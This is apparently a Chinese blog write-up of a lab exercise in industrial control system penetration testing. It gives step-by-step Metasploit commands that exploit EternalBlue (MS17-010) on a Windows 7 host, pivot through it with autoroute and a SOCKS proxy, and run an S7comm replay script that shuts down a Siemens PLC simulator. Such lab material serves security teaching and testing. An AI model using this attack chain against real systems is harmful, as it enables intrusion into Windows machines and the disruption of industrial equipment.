工控系统渗透实验

一、背景知识

1.1、Metasploit Framework(MSF)

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。

渗透测试:Metasploit 提供了一套完整的工具和模块,可用于对各种系统和应用程序进行渗透测试。

检测漏洞:Metasploit 包含一个广泛的预配置和引导漏洞模块库,可以扫描网络、指纹系统并收集有关潜在漏洞的信息。

开发漏洞:Metasploit为用户提供了强大的脚本语言,允许他们构建和连接他们的漏洞利用;

测试和评估安全控制:Metasploit 可以评估多种安全系统的功效,例如防火墙、入侵检测系统和防病毒软件。

1.2、永恒之蓝漏洞

一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

1.3、s7 common协议重放攻击(适用于S7-300、S7-400、S7-1200)

重放攻击(Replay Attacks)又称重播攻击、回放攻击,是指攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程,破坏认证的正确性。

TCP三次握手

COTP握手:COTP部分分为两种:COTP连接包和COTP功能包,COTP握手阶段使用的是COTP连接包,S7数据传输阶段使用的是COTP功能包。

S7COMM建联:S7COMM作为COTP的有效载荷,主要包含三部分:Header、Parameter、Data,建联阶段S7COMM只包含Header和Parameter两个字段。

前置

二、实验步骤

步骤1:打开MSF

Kali打开命令行,ctrl+alt+t

命令行输入:msfconsole

步骤2:利用win7的永恒之蓝漏洞

输入命令:

exploit/windows/smb/ms17_010_eternalblue

这里说的是是否使用这个漏洞,输入Y即可。

展示漏洞设置参数:show options

这里的LHOST不对,使用set LOHOST修改

set LHOST 192.168.3.163

步骤3:设置参数

set rhosts 192.168.3.162
exploit

步骤4:进入win7 cmd

查看主机网络情况

步骤5:设置静态路由

run autoroute -s 10.0.0.1/24 设置静态路由

run autoroute -p 查看是否成功

background 保存该会话且返回msf

步骤6:开启MSF的socks代理

use auxiliary/server/socks_proxy 进入该模块

set srvhost 127.0.0.1
set version 4a
set srvport 1888
完成设置之后输入exploit

步骤7:修改proxychains配置文件

在Kali机上打开新的命令行

输入

sudo vim /c/proxychains4.conf 

编辑配置文件

在最后一行添加 socks4 127.0.0.1 1888

保存并退出:esc shift+: wq(输入)+enter

步骤8:发起重放攻击

在桌面右键打开命令行并输入:proxychains4 python2 s7200_PLC.py 2

这里要进入文件夹Desktop下输入改命令

步骤9:查看攻击情况

win7上的西门子被关闭

这里我在做完kali机上的配置之后才发现win7上的plc并未开启,所以这是在最后才打开的plc模拟器,最后再执行

proxychains4 python2 s7200_PLC.py 2

最后plc被关闭

  • 9
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值